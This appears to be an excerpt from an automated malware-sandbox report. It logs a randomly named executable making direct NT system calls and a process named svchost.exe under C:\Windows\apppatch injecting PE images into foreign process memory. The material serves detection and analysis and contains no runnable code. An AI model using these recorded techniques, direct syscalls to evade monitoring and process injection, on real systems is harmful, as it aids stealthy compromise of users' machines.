Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeNtQuerySystemInformation: Direct from: 0x77382DFC
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeNtOpenSection: Direct from: 0x77382E0C
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeNtQueryVolumeInformationFile: Direct from: 0x77382F2C
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeNtSetInformationFile: Direct from: 0x77382D0C
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeNtQuerySystemInformation: Direct from: 0x773848CC
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeNtCreateKey: Direct from: 0x77382C6C
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeNtClose: Direct from: 0x77382B6C
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeNtQueryAttributesFile: Direct from: 0x77382E6C
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeNtSetInformationThread: Direct from: 0x77382B4C
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeNtQuerySystemInformation: Direct from: 0x1C
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeNtTerminateThread: Direct from: 0x77382FCC
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeNtSetInformationThread: Direct from: 0x77382ECC
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeNtQueryInformationToken: Direct from: 0x77382CAC
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeNtAllocateVirtualMemory: Direct from: 0x77382B9C
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeNtQueryValueKey: Direct from: 0x77382BEC
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeNtDeviceIoControlFile: Direct from: 0x77382AEC
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeNtCreateFile: Direct from: 0x77382FEC
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeNtOpenFile: Direct from: 0x77382DCC
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeNtEnumerateValueKey: Direct from: 0x77382BAC
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeNtSetTimerEx: Direct from: 0x77377B2E
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeNtQueueApcThread: Direct from: 0x77382EEC
Injects a PE file into a foreign processes
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 11E2000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: FE2000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 9C2000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 2EA2000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 2AF2000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 11D2000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 2AB2000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 24F2000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 2E82000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 25F2000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 2672000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 1552000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: CD2000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 1542000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 1072000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 1472000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 1222000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 9B2000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 602000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: FE2000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 942000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: F72000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 1572000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 10E2000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 1222000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 1252000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 11B2000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: AC2000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 1402000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 14A2000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 1022000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 1192000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 1552000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: A22000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: CB2000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 11A2000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 1342000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 1582000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: E12000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: FD2000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 882000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: A52000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: DF2000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: E92000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 9F2000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 1462000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 13A2000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 15D2000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 1382000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 622000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 1202000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 1592000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 1442000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: FF2000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 10D2000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: F62000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: B92000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: D62000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 1322000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 602000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: DB2000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: A32000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 1002000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: F22000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 862000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 9D2000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 11D2000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 872000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: D72000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 812000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 8D2000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: AD2000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 1212000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 1172000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: DB2000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 1092000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: A02000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 782000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 922000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 862000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 842000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: AC2000 value starts with: 4D5AJump to behavior
Writes to foreign memory regions
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 11E0000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 11E1000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 11E2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 1232000Jump to behavior
